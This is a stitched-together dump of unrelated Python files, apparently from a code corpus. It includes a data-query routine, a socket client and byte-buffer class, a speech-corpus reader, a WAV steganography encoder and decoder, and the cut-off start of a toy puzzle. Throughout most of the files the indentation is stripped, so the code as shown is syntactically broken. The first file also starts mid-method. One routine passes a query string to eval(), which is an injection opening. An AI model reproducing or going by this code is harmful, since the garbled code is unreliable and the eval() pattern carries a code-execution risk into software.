aggr = {}
dims = spec['dims']
def setfor(obj, name:str, val):
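                # Assign val into a (possibly nested) dict given a dotted name,
                # e.g. "a.b" sets obj["a"]["b"], creating intermediate dicts as needed.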
names:list = name.split('.')
while len(names) > 1:
n = names.pop(0)
if not n in obj:
obj[n] = {}
obj = obj[n]
obj[names[0]] = val
for dim in dims:
if dim["type"] == "constant":
setfor(spec, dim["name"], dim["val"])
elif dim["type"] == "column":
cols.append(dim["val"])
elif dim["type"] == "sum":
aggr[dim["val"]] = "sum"
del spec["dims"]
for v in datagroups:
group:pd.DataFrame = v[1]
                trace = {key: value for key, value in spec.items()}
if v[0]:
trace["name"] = f'{trace["name"]}#{v[0]}'
if len(aggr) > 0:
group = group.groupby(cols).aggregate(aggr).reset_index()
else:
group = group[cols]
for dim in dims:
if dim["type"] in ["column", "sum"]:
setfor(trace, dim["name"], group[dim["val"]].to_list())
traces.append(trace)
self.out.finished("Result ready", {
"traces": traces
})
def result(self, usage:str="table", query:str=None, **kwargs)->None:
try:
if usage=='stat':
self.out.finished("Listed stats", {"stat": self.__genstat()})
return
elif usage=='variables':
self.out.finished("Listed variables", {"variables": self.runspec.variables})
if self._result is None:
raise RuntimeError('No result, run first')
result = self._result[0]
if not isinstance(result, pd.DataFrame):
result = pd.DataFrame(result)
if usage=='columns':
self.out.finished("Listed columns", {"columns": [(c, str(result[c].dtype)) for c in result.columns]})
return
if self._result[1] is not None:
result["__Y__"] = self._result[1].values
if self._result[2] is not None:
result["__ID__"] = self._result[2].values
if usage=="plotly" and 'plotspec' in kwargs:
#
# go return data for plotting
#
return self.formatforplotly(result, kwargs['plotspec'])
if query is not None and query != '':
mask = result.apply(lambda x: eval(query, globals(), EvalLocals(x=x, X=result, v=self.runspec.variables)), axis=1)
result = result[mask]
#result = result.query(query)
#
# limit result to 1000 for table
#
warning = None
if result.shape[0] > 1000 and usage == "table":
count = result.shape[0]
result = result.sample(n=1000)
warning = f'Limited to 1000 out of {count} records, or use filtering to find desired records'
self.out.finished("Result ready", {
"data": result.where(pd.notnull(result), None).to_dict(orient="records"),
"variables": self.runspec.variables,
"warning": warning
})
except Exception as e:
traceback.print_exc()
self.out.error(repr(e))
def dump(self, **kwargs)->None:
try:
if self.rootblock is None:
self.out.finished("No receipe", {"receipe": None})
else:
self.out.finished("Receipe ready", {"receipe": self.rootblock.dump()})
except Exception:
traceback.print_exc()
self.out.error("Corrupted receipe")
def load(self, dump:dict, **kwargs)->None:
try:
self.rootblock = Block.load(dump)
self.out.finished("Receipe loaded")
except Exception as e:
traceback.print_exc()
self.out.error(f'Receipe load error: {repr(e)}')
def export(self, path:str=None, **kwargs)->None:
if not path:
self.out.invalid()
return
if not self.rootblock:
self.out.invalid()
return
try:
from libretto.fileio import FileIO
import joblib
vpath, valid = FileIO()._getvalidpath(path)
if not valid:
self.out.error(f'{path} is not valid')
return
with open(vpath, "wb") as f:
joblib.dump(self.rootblock, f)
self.out.finished(f'Exported to {vpath}')
except Exception as e:
traceback.print_exc()
self.out.error(f'Export failed: {repr(e)}')
# %%
``` |
{
"source": "johnwdubois/rezonator_v2",
"score": 3
} |
#### File: Python Socket Test/datafiles/client.py
```python
import socket
import struct
import pytogmlnetw
def send_message_string(mess, data):
    buffer.clear()
    buffer.write_byte(mess)
    buffer.write_bstring(data)
    s.send(buffer)
def send_message_int(mess, data):
    buffer.clear()
    buffer.write_byte(mess)
    buffer.write_int(data)
    s.send(buffer)
TCP_IP = '192.168.0.101'
TCP_PORT = 5001
print("port " + str(TCP_PORT))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
buffer = pytogmlnetw.Buffer();
state="logging"
name="";
result=0;
while True:
buffer.clear();
if state=="logging":
name=input("your name?");
send_message_string(1,name)
buffer.clear();
msg,(addr,port)=s.recvfrom(4096)
buffer.clear()
if msg:
buffer.load(msg);
msg_code=buffer.read_ubyte();
if msg_code==1:
data=buffer.read_int();
print("My ID: "+str(data))
state="chatting"
```
#### File: Python Socket Test/datafiles/pytogmlnetw.py
```python
import struct
import binascii
class Buffer(bytearray):
index = 0
length=0;
def __init__(self, message=""):
self[:] = bytearray()#message.encode()
def get_readpos(self):
return self.index
def set_readpos(self, i):
self.index = i
def clear(self):
self.index = 0
self[:] = bytearray();
def load(self, message=""):
self[:] = bytearray(message)
self.index = 0
def read_ubyte(self):
ubyte = self[self.index:self.index+1]
self.index += 1
return struct.unpack("!B", bytes(ubyte))[0]
def read_byte(self):
byte = self[self.index:self.index+1]
self.index += 1
return struct.unpack("!b", bytes(byte))[0]
def read_ushort(self):
ushort = self[self.index:self.index+2]
self.index += 2
return struct.unpack("!H", bytes(ushort))[0]
def read_short(self):
short = self[self.index:self.index+2]
self.index += 2
return struct.unpack("!h", bytes(short))[0]
def read_uint(self):
uint = self[self.index:self.index+4]
print(uint)
self.index += 4
#return struct.unpack("!I", bytes(uint))[0]
i=int.from_bytes(uint, byteorder='big', signed=False)
print(i)
return i;
def read_int(self):
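        # Read a variable-length big-endian signed integer: count the non-zero
        # bytes among the next four and unpack that many bytes.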
        length = 0
integer = self[self.index:self.index+4]
for i in integer:
if i!=0:
length+=1;
#print(i)
integer = self[self.index:self.index+length]
#print(self.index)
if length==1:
self.index += 1
#print(self.index)
return int.from_bytes(integer, byteorder='big', signed=True)#struct.unpack("h", bytes(integer))[0]
if length==2:
self.index += 2
#print(self.index)
return struct.unpack("h", bytes(integer))[0]
if length==3:
self.index += 3
#print(self.index)
return struct.unpack("BH", bytes(integer))[0]
if length==4:
self.index += 4
#print(self.index)
return struct.unpack("I", bytes(integer))[0]
def read_float(self):
fl = self[self.index:self.index+4]
self.index += 4
return struct.unpack("!f", str(fl))[0]
def read_double(self):
db = self[self.index:self.index+8]
self.index += 8
return struct.unpack("!d", str(db))[0]
def read_string(self, length):
string = self[self.index:self.index+length]
self.index += length
return struct.unpack("!"+str(length)+"s", str(string))[0]
def read_bstring(self):
length = struct.unpack("!B",str(self[self.index:self.index+1]))[0]
self.index += 1
string = self[self.index:self.index+length]
self.index += length
return struct.unpack("!"+str(length)+bytearray("s"), str(string))[0]
def read_sstring(self):
length = struct.unpack("!H",str(self[self.index:self.index+2]))[0]
self.index += 2
string = self[self.index:self.index+length]
self.index += length
return struct.unpack("!"+str(length)+"s", str(string))[0]
def read_istring(self):
length = struct.unpack("!I",str(self[self.index:self.index+4]))[0]
self.index += 4
string = self[self.index:self.index+length]
self.index += length
return struct.unpack("!"+str(length)+"s", str(string))[0]
def write_ubyte(self, ubyte):
self += struct.pack("=B", ubyte)
return len(self)
def write_byte(self, byte):
self += struct.pack("=b", byte)
return len(self)
def write_ushort(self, ushort):
self += struct.pack("=H", ushort)
return len(self)
def write_short(self, short):
self += struct.pack("=h", short)
return len(self)
def write_uint(self, uint):
self += struct.pack("=I", uint)
return len(self)
def write_int(self, integer):
self += struct.pack("=i", integer)
return len(self)
def write_float(self, fl):
self += struct.pack("=f", fl)
return len(self)
def write_double(self, db):
self += struct.pack("=d", db)
return len(self)
    def write_string(self, string):
        string = bytes(string, encoding='utf-8')
        self += struct.pack("="+str(len(string))+"s", string)
        return len(self)
def write_bstring(self, string):
string=bytes(string,encoding='utf-8')
self += struct.pack("="+str(len(string))+"s",string)
return len(self)
    def write_sstring(self, string):
        string = bytes(string, encoding='utf-8')
        self += struct.pack("=H", len(string))
        self += struct.pack("="+str(len(string))+"s", string)
        return len(self)
    def write_istring(self, string):
        string = bytes(string, encoding='utf-8')
        self += struct.pack("=I", len(string))
        self += struct.pack("="+str(len(string))+"s", string)
        return len(self)
```
#### File: SBCorpus-py/SBCorpus-py/reader.py
```python
import SBCorpus
from SBCorpus.metadata import metadata
import re
class SBCorpusReader():
def __init__(self):
#self.corpus = SBCorpus.xmlreader()
self.corpus = SBCorpus.corpus
self.positions={
'ID':0,
'NAME':1,
'GENDER':2,
'AGE':3,
'HOMETOWN':4,
'HOMESTATE':5,
'CURRENTSTATE':6,
'EDUCATION':7,
'YEARSEDUCATION':8,
'OCCUPATION':9,
'ETHNICITY':10,
'TEXTS':11
}
def copy_object(self, obj):
if type(obj) in (str,int,float):
output=obj
elif type(obj)==list:
output=[]
for item in obj:
output+=[self.copy_object(item)]
elif type(obj)==tuple:
output=[]
for item in obj:
output+=[self.copy_object(item)]
output=tuple(output)
elif type(obj)==dict:
output={}
for key in list(obj):
output[key]=self.copy_object(obj[key])
return output
def copy_part(self, output, source, text=None, turn=None, IU=None, word=None, tiers=None):
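        # Copy one slice of the nested corpus dict (down to text/turn/IU/word)
        # from source into output, creating any missing parent entries along the way.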
if text != None:
if turn != None:
if text not in output:
output[text] = {'name':source[text]['name']}
if IU != None:
if turn not in output[text]:
output[text][turn] = {'ID':source[text][turn]['ID']}
if word != None:
if IU not in output[text][turn]:
output[text][turn][IU] = {'start':source[text][turn][IU]['start'], 'end':source[text][turn][IU]['end']}
if tiers != None:
if word not in output[text][turn][IU]:
output[text][turn][IU][word] = {}
for tier in tiers:
if word not in output[text][turn][IU][word]:
output[text][turn][IU][word][tier] = self.copy_object(source[text][turn][IU][word][tier])
elif tiers == None:
output[text][turn][IU][word] = self.copy_object(source[text][turn][IU][word])
elif word == None:
output[text][turn][IU] = self.copy_object(source[text][turn][IU])
elif IU == None:
output[text][turn] = self.copy_object(source[text][turn])
elif turn == None:
output[text] = self.copy_object(source[text])
elif text == None:
output = self.copy_object(source)
return output
def get_range(self, terms):
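        # Expand a "start:end" string into a list of ints; otherwise return a
        # single-element list (int if the term is numeric, else the raw string).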
if ':' in terms:
nrange=[]
for i in range(int(terms.split(':')[0]),int(terms.split(':')[1])+1):
nrange.append(i)
terms = nrange
else:
            if re.match(r'^\d*$', terms) is None:
terms = [terms]
else:
terms = [int(terms)]
return terms
def get_parameters(self, identifier, negative=False, capsearch=True):
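        # Parse a query such as "KEY=1:5,KEY2!=foo" into dicts of included and
        # excluded terms; bare terms go under 'generic' and, when present, are returned directly.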
identifiers = {}
remove = {}
if type(identifier) in [list,tuple]:
return identifier
elif type(identifier) in [int, float]:
return [identifier]
if ',' in identifier:
identifier = identifier.split(',')
elif type(identifier) == str:
identifier = [identifier]
for parameter in identifier:
if '!=' in parameter:
search,terms = parameter.split('!=')
if capsearch == True:
search = search.upper()
terms = self.get_range(terms)
if search not in remove:
remove[search] = terms
else:
remove[search] += terms
elif '=' in parameter:
search,terms = parameter.split('=')
if capsearch == True:
search = search.upper()
terms = self.get_range(terms)
if search not in identifiers:
identifiers[search] = terms
else:
identifiers[search] += terms
else:
if 'generic' not in identifiers:
identifiers['generic'] = self.get_range(parameter)
else:
identifiers['generic'] += self.get_range(parameter)
if 'generic' in identifiers:
return identifiers['generic']
else:
if negative == True:
return identifiers, remove
else:
return identifiers
def generator(self, extract, level):
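        # Flatten a nested subset dict into a sorted list of keys at the requested
        # level: text numbers for 'text', (text, turn) tuples for 'turn', and so on.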
output = []
for text in extract:
if type(text) == int:
if level == 'text':
output += [text]
else:
for turn in extract[text]:
if type(turn) == int:
if level == 'turn':
output += [(text, turn)]
else:
for IU in extract[text][turn]:
if type(IU) == int:
if level == 'IU':
output += [(text, turn, IU)]
else:
for word in extract[text][turn][IU]:
if type(word) == int:
if level == 'word':
output += [(text, turn, IU, word)]
output.sort()
return output
def getParticipants(self, identifier='all', info='all'):
if identifier != 'all':
identifiers,remove = self.get_parameters(identifier, negative=True)
containing = []
outtakes=[]
for key in identifiers:
for participant in metadata:
for term in identifiers[key]:
pos = participant[self.positions[key]]
if type(pos) in [int,float,str]:
if term == pos:
containing.append(participant)
elif type(pos) in [list,tuple]:
if term in pos:
containing.append(participant)
else:
outtakes.append(participant)
output = []
for participant in containing:
for key in remove:
for term in remove[key]:
pos = participant[self.positions[key]]
if type(pos) in [int,float,str]:
if term == pos:
outtakes.append(participant)
elif type(pos) in [list,tuple]:
if term in pos:
outtakes.append(participant)
else:
output=[]
outtakes=[]
containing = self.copy_object(metadata)
for participant in containing:
if participant not in outtakes:
output += [participant]
if info == 'all':
return output
else:
output = [x[self.positions[info]] for x in output]
newoutput = []
for element in output:
if type(element) == list:
newoutput += [e for e in element if e not in newoutput]
elif element not in newoutput:
newoutput += [element]
return newoutput
def printParticipants(self, identifier):
participants = self.getParticipants(identifier, info='all')
output = []
for key in self.positions:
output.append(key)
for participant in participants:
for key in output:
value = participant[self.positions[key]]
if type(value) in [int,float]:
value = str(value)
elif type(value) == list:
value = ', '.join([str(v) for v in value])
print (key+': '+value)
print()
def format_time(self, flt, decimal=3):
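        # Format a number with exactly `decimal` decimal places, zero-padding or
        # rounding the fractional part as needed.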
output = str(flt)
if decimal > 0:
if '.' not in output:
output += '.'
before = output.split('.')[0]
after = output.split('.')[1]
zeros = decimal - len(after)
if zeros >= 0:
output += '0'*zeros
return output
elif zeros < 0:
if int(after[zeros]) < 5:
return output[:zeros]
else:
after = str(int(after[:zeros])+1)
if len(after) > decimal:
return str(int(before)+1) + '.' + after[1:]
else:
return before + '.' + after
def getTexts(self, subset=None, textlist='all', participants='all'):
if subset == None:
subset = self.copy_object(self.corpus)
output = {}
if textlist != 'all':
textlist = self.get_parameters(textlist)
else:
textlist = [i for i in range(1,61)]
if participants == 'all':
ppl = self.getParticipants(info='ID')
ppl = self.getParticipants(participants, 'TEXTS')
for txt in textlist:
if txt in ppl and txt in subset:
output[txt] = self.copy_object(subset[txt])
return output
def getTurns(self, subset=None, textlist='all', turnlist='all', IUlist='all', participants='all', containing='any', afterTurn='any', beforeTurn='any', offset=0, before='any', after='any', at='any', minlength='any', maxlength='any'):
subset = self.getTexts(subset=subset, textlist=textlist, participants=participants)
if (containing,IUlist) != ('any','all'):
IUs = self.getIUs(subset=subset, IUlist=IUlist, containing=containing)
else:
IUs=subset
list(IUs)
turns = {}
for text,turn in self.generator(IUs, 'turn'):
turns = self.copy_part(turns, subset, text, turn)
output = {}
if afterTurn != 'any':
turns_after = {}
for text,turn in self.generator(afterTurn, 'turn'):
if text in turns:
if turn+1 in turns[text]:
turns_after = self.copy_part(turns_after, turns, text, turn+1)
turns = turns_after
del turns_after
if beforeTurn != 'any':
turns_before = {}
for text,turn in self.generator(beforeTurn, 'turn'):
if text in turns:
if turn-1 in turns[text]:
turns_before = self.copy_part(turns_before, turns, text, turn-1)
turns = turns_before
del turns_before
IDs = [0] + self.getParticipants(participants, 'ID')
if turnlist != 'all':
turnlist = self.get_parameters(turnlist)
for text,turn in self.generator(turns,'turn'):
accept = True
if turn+offset in turns[text]:
if turns[text][turn]['ID'] not in IDs:
accept = False
if turnlist != 'all':
if turn + offset not in turnlist:
accept = False
ius = [iu for iu in turns[text][turn+offset] if (type(iu) == int)]
if ius != []:
start = turns[text][turn+offset][min(ius)]['start']
end = turns[text][turn+offset][max(ius)]['end']
if type(maxlength) in [int, float]:
if end - start > maxlength:
accept = False
if type(minlength) in [int, float]:
if end - start < minlength:
accept = False
if type(at) in [int, float]:
if at < start or at > end:
accept = False
if type(after) in [int, float]:
if start < after:
accept = False
if type(before) in [int, float]:
if end > before:
accept = False
elif (maxlength,minlength,at,after,before) != ('any','any','any','any','any'):
accept = False
print(ius)
else:
accept = False
if accept == True:
output = self.copy_part(output,turns,text,turn+offset)
return output
def getIUs(self, subset=None, textlist='all', turnlist='all', IUlist='all', participants='all', containing='any', after='any', at='any', before='any', maxlength='any', minlength='any'):
subset = self.getTexts(subset=subset,participants=participants,textlist=textlist)
        if (turnlist, participants) != ('all', 'all'):
subset = self.getTurns(subset, turnlist=turnlist, participants=participants)
IUs = {}
if containing != 'any':
words = self.getWords(subset=subset,containing=containing)
for text,turn,IU in self.generator(words,'IU'):
IUs = self.copy_part(IUs, subset, text, turn, IU)
subset = IUs
del IUs
output={}
if IUlist != 'all':
IUlist = self.get_parameters(IUlist)
for text,turn,IU in self.generator(subset, 'IU'):
iu = subset[text][turn][IU]
accept = True
if IUlist != 'all':
if IU not in IUlist:
accept = False
if type(maxlength) in [int, float]:
if iu['end'] - iu['start'] > maxlength:
accept = False
if type(minlength) in [int, float]:
if iu['end'] - iu['start'] < minlength:
accept = False
if type(at) in [int, float]:
if at < iu['start'] or at > iu['end']:
accept = False
if type(after) in [int, float]:
if iu['start'] < after:
accept = False
if type(before) in [int, float]:
if iu['end'] > before:
accept = False
if accept == True:
output = self.copy_part(output, subset, text, turn, IU)
return output
def getWords(self, subset=None, textlist='all', turnlist='all', IUlist='all', participants='all', containing='all', tier='dt', aslist=False, unit='word', fromstart='any', fromend='any'):
output = {}
subset = self.getIUs(subset=subset, textlist=textlist, turnlist=turnlist, IUlist=IUlist, participants=participants)
if containing != 'all':
containing,remove = self.get_parameters(containing, negative=True)
for text,turn,IU,word in self.generator(subset, 'word'):
accept = True
if type(fromstart) == int:
if word > fromstart:
accept = False
if type(fromend) == int:
for i in range(0,fromend):
if word+i not in subset[text][turn][IU]:
accept = False
if containing != 'all':
for search in containing:
for term in containing[search]:
if search.lower() in ['dt','word']:
if term[0:2] == "r'" and term[-1] == "'":
if re.match(term[2:-1],subset[text][turn][IU][word][search.lower()]) == None:
accept = False
elif term != subset[text][turn][IU][word][search.lower()]:
accept = False
elif search.lower() == 'manner':
if term not in subset[text][turn][IU][word]['manner'] and term.upper() not in subset[text][turn][IU][word]['manner']:
accept = False
elif search == 'POS':
if term != subset[text][turn][IU][word]['POS']:
accept = False
for search in remove:
for term in remove[search]:
if search.lower() in ['dt','word']:
if term[0:2] == "r'" and term[-1] == "'":
if re.match(term[2:-1],subset[text][turn][IU][word][search.lower()]) != None:
accept = False
elif term == subset[text][turn][IU][word][search.lower()]:
accept = False
elif search.lower() == 'manner':
if term not in subset[text][turn][IU][word]['manner'] and term.upper() not in subset[text][turn][IU][word]['manner']:
accept = False
elif search == 'POS':
if term != subset[text][turn][IU][word]['POS']:
accept = False
if accept == True:
output = self.copy_part(output, subset, text, turn, IU, word)
if aslist == True:
if unit == 'IU':
output = self.listWords(output, tier=tier, IUs=True)
elif unit == 'word':
output = self.listWords(output, tier=tier, IUs=False)
return output
def combineSubsets(self, excerpt1, excerpt2=None):
if type(excerpt1) == list:
output = self.copy_object(excerpt1[0])
for subset in excerpt1[1:]:
for text,turn,IU,word in self.generator(subset, 'word'):
output = self.copy_part(output,subset,text,turn,IU,word)
elif type(excerpt1) == dict and excerpt2 != None:
output = self.copy_object(excerpt1)
for text,turn,IU,word in self.generator(excerpt2, 'word'):
output = self.copy_part(output,excerpt2,text,turn,IU,word)
return output
def getWindow(self, subset='all', castunit='IU', outputunit='IU', size=10, shift=5):
output = {}
complete = [0]
if subset == 'all':
subset = self.getTexts()
if castunit in ['millisecond', 'ms']:
size = float(size)/1000.000
shift = float(shift)/1000.000
minus = 0.001
castunit = 's'
if outputunit == 'word':
print('No data for timing of words. Returning output in IUs.')
return self.getWindow(subset=subset,castunit=castunit,outputunit='IU',size=size,shift=shift)
elif castunit in ['second', 's']:
minus = 1.000
castunit = 's'
if outputunit == 'word':
print('No data for timing of words. Returning output in IUs.')
return self.getWindow(subset=subset,castunit=castunit,outputunit='IU',size=size,shift=shift)
elif castunit in ['minute', 'm']:
size = float(size)*60.000
shift = float(shift)*60.000
minus = 60.000
castunit = 's'
if outputunit == 'word':
print('No data for timing of words. Returning output in IUs.')
return self.getWindow(subset=subset,castunit=castunit,outputunit='IU',size=size,shift=shift)
elif castunit == 'word':
if outputunit == 'IU':
words = self.getWindow(subset=subset, castunit=castunit, outputunit='word', size=size, shift=shift)
for window in range(0,len(words)):
if window+1 not in output:
output[window+1] = {}
for text,turn,iu in self.generator(words[window], 'IU'):
output[window+1] = self.copy_part(output[window+1], subset, text, turn, iu)
elif outputunit == 'turn':
                words = self.getWindow(subset=subset, castunit=castunit, outputunit='word', size=size, shift=shift)
for window in range(0,len(words)):
if window+1 not in output:
output[window+1] = {}
for text,turn in self.generator(words[window], 'turn'):
output[window+1] = self.copy_part(output[window+1], subset, text, turn)
elif castunit == 'IU':
if outputunit == 'turn':
                IUs = self.getWindow(subset=subset, castunit=castunit, outputunit='IU', size=size, shift=shift)
for window in range(0,len(IUs)):
if window+1 not in output:
output[window+1] = {}
for text,turn in self.generator(IUs[window], 'turn'):
output[window+1] = self.copy_part(output[window+1], subset, text, turn)
if outputunit == 'word':
return self.getWindow(subset=subset, castunit=castunit, outputunit='IU', size=size, shift=shift)
elif castunit == 'turn':
if outputunit in ('IU','word'):
return self.getWindow(subset=subset, castunit=castunit, outputunit='turn', size=size, shift=shift)
point = size
for text in self.generator(subset,'text'):
if outputunit == 'word':
if castunit == 'word':
complete = [0]
wordno=0
for txt,trn,iu,wd in self.generator({text:subset[text]},'word'):
end = False
i = max(complete)+1
while end == False:
number = size*2
if i not in output:
output[i] = {}
isize = len(self.listWords(words=output[i], IUs=False))
point = size + ((i-1) * shift)
if number == isize or wordno > size + ((i-1) * shift) + size:
complete.append(i)
elif point + size >= wordno and point - size <= wordno:
output[i] = self.copy_part(output[i], subset, text, trn, iu, wd)
else:
end = True
i+=1
wordno += 1
elif outputunit == 'IU':
i = 1
end = False
if castunit == 'IU':
while end == False:
minIU = str(point - size)
maxIU = str(point + size - 1)
IUrange = ':'.join([minIU,maxIU])
window = self.getIUs(subset=subset,textlist=text,IUlist=IUrange)
if window == {}:
end = True
else:
output[i] = window
i+=1
point += shift
elif castunit == 's':
while end == False:
minIU = point - size
maxIU = point + size - minus
window = self.combineSubsets([self.getIUs(subset=subset,textlist=text,after=minIU,before=maxIU),
self.getIUs(subset=subset,textlist=text,at=minIU),
self.getIUs(subset=subset,textlist=text,at=maxIU)])
if window == {}:
end = True
else:
output[i] = window
i+=1
point += shift
elif outputunit == 'turn':
i = 1
end = False
if castunit == 's':
while end == False:
minturn = point - size
maxturn = point + size - minus
window = self.combineSubsets([self.getTurns(subset=subset,textlist=text,after=minturn,before=maxturn),
self.getTurns(subset=subset,textlist=text,at=minturn),
self.getTurns(subset=subset,textlist=text,at=maxturn)])
if window == {}:
end = True
else:
output[i] = window
i+=1
point += shift
return [output[window] for window in output if output[window] != {}]
def printSubset(self, subset, title=True, tier='dt', timestamps=True, labels=True, numberedlines=False, decimal=3):
output = ''
for text in subset:
output += '\n'
header = subset[text]['name']+' ('
turns = [t for t in list(subset[text]) if (type(t) == int)]
turns.sort()
turn1 = min(turns)
IUlist = [iu for iu in list(subset[text][turn1]) if (type(iu) == int)]
IUlist.sort()
IU1 = min(IUlist)
lstturn = max(turns)
IUlist = [iu for iu in list(subset[text][lstturn]) if (type(iu) == int)]
lstIU = max(IUlist)
header += self.format_time(subset[text][turn1][IU1]['start'], decimal) + ' - ' + self.format_time(subset[text][lstturn][lstIU]['end'], decimal) + ')\n'
if title == True:
output += header
for turn in turns:
IUlist = [i for i in subset[text][turn] if (type(i) == int)]
IUlist.sort()
label = subset[text][turn]['ID']
if label == 0:
label = 'OTHER'
else:
label = self.getParticipants('ID='+str(label),'NAME')[-1]
IU1 = min(IUlist)
turn_start = self.format_time(subset[text][turn][IU1]['start'], decimal)
turn_end = self.format_time(subset[text][turn][IU1]['end'], decimal)
if numberedlines == True:
output += str(IU1)+'\t'
if timestamps == True:
output += turn_start + '\t' + turn_end + '\t'
if labels == True:
output += label + ';\t'
IUtext = []
words = [wd for wd in list(subset[text][turn][IU1]) if (type(wd) == int)]
words.sort()
for word in words:
IUtext += [subset[text][turn][IU1][word][tier]]
output += ' '.join(IUtext) + '\n'
if len(IUlist) > 1:
for IU in IUlist[1:]:
IUtext = []
turn_start = self.format_time(subset[text][turn][IU]['start'], decimal)
turn_end = self.format_time(subset[text][turn][IU]['end'], decimal)
if numberedlines == True:
output += str(IU)+'\t'
if timestamps == True:
output += turn_start + '\t' + turn_end + '\t'
if labels == True:
output += '\t'
IUtext = []
words = [wd for wd in list(subset[text][turn][IU]) if (type(wd) == int)]
words.sort()
for word in words:
IUtext += [subset[text][turn][IU][word][tier]]
output += ' '.join(IUtext) + '\n'
print(output)
def listWords(self, words='all', tier='dt', IUs=True):
wordlist=[]
IUlist=[]
if words == 'all':
            words = self.getTexts()
prevIU = int
for text,turn,IU,word in self.generator(words,'word'):
if IUs == True:
if prevIU != IU:
if prevIU != int:
wordlist += [[IUlist]]
IUlist = []
IUlist += [words[text][turn][IU][word][tier]]
prevIU = IU
else:
wordlist += [words[text][turn][IU][word][tier]]
if IUlist != []:
wordlist += IUlist
return wordlist
``` |
{
"source": "JohnWebb4/steganography",
"score": 3
} |
#### File: JohnWebb4/steganography/steg_wav.py
```python
import numpy as np
import os
import soundfile as sf # Read/Write sound
import time # write time
buffer_size = 1024 # buffer size
byte_max = 255 # max value of byte
fft_first_value = -45 # first value of fft
message_ext = ".wav" # encoding file type
noise_fft_scale = 2 # amplitude of noise
progress_every = 10 # write progress every x %
sample_rate = 44100 # sampling rate
def compare():
"""
Compare bytes of file
:return: None
"""
filename_1 = input("Enter the first filename: ") # get filename
filename_2 = input("Enter the second filename: ") # get filename
n_correct = 0 # number of correct
file_1_size = os.path.getsize(filename_1) # get file 1 size
with open(filename_1, "rb") as file_1: # open file 1
with open(filename_2, "rb") as file_2: # open file 2
while True: # till eof
buffer_1 = file_1.read(buffer_size) # read buffer
buffer_2 = file_2.read(buffer_size) # read buffer
if buffer_1 and buffer_2: # if read values
int_buff_1 = [b for b in buffer_1] # get integer values
int_buff_2 = [b for b in buffer_2] # get integer values
n_correct += np.sum(np.equal(int_buff_1, int_buff_2)) # increment number of identical values
else: # no buffer
break # end comparison
# Write results
print("{0} is {1}% or {2} bytes different from {3}".format(filename_2,
100 - n_correct / file_1_size * 100,
file_1_size - n_correct,
filename_1)) # write results
def decode():
"""
Decode message
:return: None
"""
filename = input("Enter the file to decode: ") # get filename
out_filename = os.path.splitext(filename)[0] # get file without extension
sound, sample = sf.read(filename) # read sound file
len_sound = len(sound) # get length of sound file
buffer_sound_size = buffer_size + 2 # calculate sound buffer size
with open(out_filename, "wb") as f: # open output file
position = 0 # position in file
prev_percent_progress = 0 # position of last writing progress
prev_time = time.time() # get time
while position < len_sound: # cycle through sound file
sound_data = sound[position:position+buffer_sound_size] # read buffer
valid_freq = np.fft.fft(sound_data)[1:int(len(sound_data) / 2)] # validate frequency
real_valid_freq = np.real(valid_freq) # get real values
imag_valid_freq = np.imag(valid_freq) # get imaginary values
scale_valid_freq = np.concatenate((real_valid_freq, imag_valid_freq), axis=0) # concatenate
if len(sound_data) != buffer_sound_size: # if last buffer
scale_valid_freq = scale_valid_freq[:-1] # slice last element
buffer = bytearray(np.array(np.round(scale_valid_freq * byte_max / noise_fft_scale),
dtype=np.int8)) # validate conversion
if buffer: # if read data
f.write(buffer) # write buffer
# Update position
percent_progress = position / len_sound * 100 # get progress as %
if percent_progress - prev_percent_progress >= progress_every: # if need to write progress
print("{0}% complete in {1} seconds.".format(percent_progress,
time.time() - prev_time)) # write progress
prev_percent_progress = percent_progress # update previous position
position += len(sound_data) # increment position
else: # if no data
break # end file
print("Done decoding {0} to {1}".format(filename, out_filename)) # write done
def encode():
"""
Encode message
:return: None
"""
filename = input("Enter the file to encode: ") # get filename
file_size = os.path.getsize(filename) # get file size
out_filename = filename + message_ext # get output filename
sound = [] # declare sound
position = 0 # position in file
prev_percent_progress = 0 # previous position for writing progress
prev_time = time.time() # get current time
with open(filename, "rb") as f: # open file
n_correct = 0 # number of lossless conversions
while True: # till eof
buffer = f.read(buffer_size) # read buffer
if buffer: # if can read
float_buffer = np.array([float(b) for b in buffer]) # write buffer to floats
if len(float_buffer) % 2 != 0: # if odd
                    float_buffer = np.concatenate((float_buffer, [0]), axis=0)  # pad with a zero to make the length even
real_buff, imag_buff = np.split(float_buffer / byte_max * noise_fft_scale, 2) # split buffer
fft_data = [complex(i, j) for i, j in zip(real_buff, imag_buff)] # compress
fft_data = [complex(fft_first_value, 0)] + fft_data + [complex(0, 0)]
back_buffer = np.flip(np.conj(fft_data[1:-1]), axis=0) # slice buffer back
fft_data.extend(back_buffer) # concatenate
sound_data = np.real(np.fft.ifft(fft_data)) # get real part
# Validate
valid_freq = np.fft.fft(sound_data)[1:int(len(sound_data) / 2)] # validate frequency
real_valid_freq = np.real(valid_freq) # get real values
imag_valid_freq = np.imag(valid_freq) # get imaginary values
scale_valid_freq = np.concatenate((real_valid_freq, imag_valid_freq), axis=0) # concatenate
valid_buffer = np.round(scale_valid_freq * byte_max / noise_fft_scale) # validate conversion
n_correct += np.sum(np.equal(float_buffer, valid_buffer)) # validate data
sound.extend(sound_data) # extend sound file
# update position
percent_progress = position / file_size * 100 # convert progress to percent
if percent_progress - prev_percent_progress >= progress_every: # if need to write progress
print("{0}% done in {1} seconds.".format(percent_progress,
time.time() - prev_time)) # write progress
prev_percent_progress = percent_progress # update previous position
position += len(buffer) # increment position
else: # if can't read
break # end encoding
print("{0}% of {1} lossless conversion.".format(n_correct / file_size * 100, file_size)) # write results
sf.write(out_filename, sound, sample_rate) # write sound file
def main():
"""
Main script program
:return: None
"""
is_exit = False # should exit
print_help() # print help
while not is_exit: # while should not exit
command = input("Enter a command: ").lower() # get command
if command == "exit":
is_exit = True # should exit
elif command == "compare": # if compare
compare() # call compare
elif command == "decode": # if decode
decode() # call decode
elif command == "encode": # if encode
encode() # call encode
def print_help():
"""
Write help to console
:return: None
"""
print("Type 'Compare' to compare bytes.") # write compare
print("Type 'Decode' to decode a message.") # write decode
print("Type 'Encode' to write a message.") # write encode
print("Type 'Exit' to close.") # write exit
if __name__ == "__main__": # if running script
main() # call main
``` |
{
"source": "JohnWebb4/toy-problems",
"score": 4
} |
#### File: src/containerOfBalls/containerOfBalls.py
```python
from copy import deepcopy
# Input container: array of array of ints. Number of each ball type in each container
# Output: 'Possible' or 'Impossible' to swap balls and sort
# Side Effects: None
# Create map storing count of each type of ball
# Create map storing number of balls in each container
# For each type
